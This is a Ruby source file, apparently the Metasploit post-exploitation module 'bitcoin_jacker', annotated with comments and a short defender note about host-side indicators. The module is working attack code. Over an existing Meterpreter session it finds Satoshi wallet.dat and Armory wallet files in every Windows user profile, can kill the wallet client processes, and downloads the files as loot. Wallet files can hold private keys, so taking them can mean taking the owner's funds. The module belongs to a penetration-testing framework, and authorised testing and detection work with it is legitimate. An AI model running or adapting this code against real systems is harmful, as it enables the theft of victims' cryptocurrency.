Path: blob/master/modules/post/windows/gather/bitcoin_jacker.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Post-exploitation module that walks every user profile's AppData directory
# on the target, looks for a Satoshi `wallet.dat` and Armory `*.wallet` files,
# and saves whatever it can read as loot through `store_loot`. Only the
# `meterpreter` session type is declared, and the module relies on the
# `stdapi_sys_process_get_processes` / `stdapi_sys_process_kill` commands when
# KILL_PROCESSES is enabled.
#
# Defender note: the observable host-side footprint of this module is reads of
# `%APPDATA%\Bitcoin\wallet.dat` / `%APPDATA%\Armory\*.wallet` by a process that
# is not the wallet client, optionally preceded by termination of
# bitcoin.exe / bitcoind.exe / ArmoryQt.exe.
class MetasploitModule < Msf::Post
  include Msf::Auxiliary::Report
  include Msf::Post::Windows::UserProfiles
  include Msf::Post::File

  # Registers module metadata and the single KILL_PROCESSES option.
  #
  # @param info [Hash] metadata merged by `update_info`
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Windows Gather Bitcoin Wallet',
        'Description' => %q{
          This module downloads any Bitcoin wallet files from the target
          system. It currently supports both the classic Satoshi wallet and the
          more recent Armory wallets. Note that Satoshi wallets tend to be
          unencrypted by default, while Armory wallets tend to be encrypted by default.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'illwill <illwill[at]illmob.org>', # Original implementation
          'todb' # Added Armory support
        ],
        'Platform' => [ 'win' ], # TODO: Several more platforms host Bitcoin wallets...
        'SessionTypes' => [ 'meterpreter' ],
        'Compat' => {
          'Meterpreter' => {
            'Commands' => %w[
              stdapi_sys_process_get_processes
              stdapi_sys_process_kill
            ]
          }
        }
      )
    )

    # KILL_PROCESSES defaults to false; it is only consulted in jack_wallet.
    register_options([
      OptBool.new('KILL_PROCESSES', [false, 'Kill associated Bitcoin processes before jacking.', false]),
    ])
  end

  # Entry point. Iterates the profiles returned by `grab_user_profiles`,
  # skipping any without an 'AppData' entry, and hands each wallet path it
  # finds to `jack_wallet`. Prints a warning if no wallet was found at all.
  #
  # @return [void]
  def run
    print_status('Checking all user profiles for Bitcoin wallets...')
    found_wallets = false
    grab_user_profiles.each do |user|
      next unless user['AppData']

      bitcoin_wallet_path = user['AppData'] + '\\Bitcoin\\wallet.dat'
      # Profiles with no Satoshi wallet.dat are skipped entirely, so the
      # Armory directory listing below is only reached when wallet.dat exists.
      next unless file?(bitcoin_wallet_path)

      found_wallets = true
      jack_wallet(bitcoin_wallet_path)
      armory_wallet_path = user['AppData'] + '\\Armory'
      # Armory wallets are matched by name only (any entry containing ".wallet").
      session.fs.dir.foreach(armory_wallet_path) do |fname|
        next unless fname =~ /\.wallet/

        found_wallets = true
        armory_wallet_fullpath = armory_wallet_path + "\\#{fname}"
        jack_wallet(armory_wallet_fullpath)
      end
    end
    unless found_wallets
      print_warning 'No wallets found, nothing to do.'
    end
  end

  # Classifies a wallet path by its suffix, optionally kills wallet client
  # processes, reads the file with `read_file`, and stores it as loot.
  #
  # @param wallet_path [String] full remote path of the wallet file
  # @return [void] returns early on an unknown suffix or a read failure
  def jack_wallet(wallet_path)
    data = ''
    # Suffix-based classification: Armory files end in ".wallet", the Satoshi
    # client's file is "wallet.dat"; anything else is rejected below.
    wallet_type = case wallet_path
                  when /\.wallet$/
                    :armory
                  when /wallet\.dat$/
                    :satoshi
                  else
                    :unknown
                  end

    if wallet_type == :unknown
      print_error "Unknown wallet type: #{wallet_path}, nothing to do."
      return
    end

    print_status("#{wallet_type.to_s.capitalize} Wallet found at #{wallet_path}")
    print_status("Jackin' wallet...")

    kill_bitcoin_processes if datastore['KILL_PROCESSES']

    begin
      # read_file may return nil; coerce to '' so the emptiness check holds.
      data = read_file(wallet_path) || ''
    # NOTE(review): ::Exception is broader than StandardError and also catches
    # Interrupt / SystemExit; a narrower rescue would be conventional here.
    rescue ::Exception => e
      print_error("Failed to download #{wallet_path}: #{e.class} #{e}")
      return
    end

    if data.empty?
      print_error('No data found, nothing to save.')
    else
      # Loot is keyed by type ("bitcoin.wallet.armory" / "bitcoin.wallet.satoshi")
      # and stored with the original remote path as its filename hint.
      loot_result = store_loot(
        "bitcoin.wallet.#{wallet_type}",
        'application/octet-stream',
        session,
        data,
        wallet_path,
        "Bitcoin Wallet (#{wallet_type.to_s.capitalize})"
      )
      print_status("Wallet jacked: #{loot_result}")
    end
  end

  # Terminates any running bitcoin.exe, bitcoind.exe or armoryqt.exe found in
  # the target's process list (name comparison is case-insensitive).
  #
  # @return [void]
  def kill_bitcoin_processes
    client.sys.process.get_processes.each do |process|
      pname = process['name'].downcase
      next unless pname == 'bitcoin.exe' || pname == 'bitcoind.exe' || pname == 'armoryqt.exe'

      print_status("#{process['name']} Process Found...")
      print_status("Killing Process ID #{process['pid']}...")
      session.sys.process.kill(process['pid'])
    end
  end
end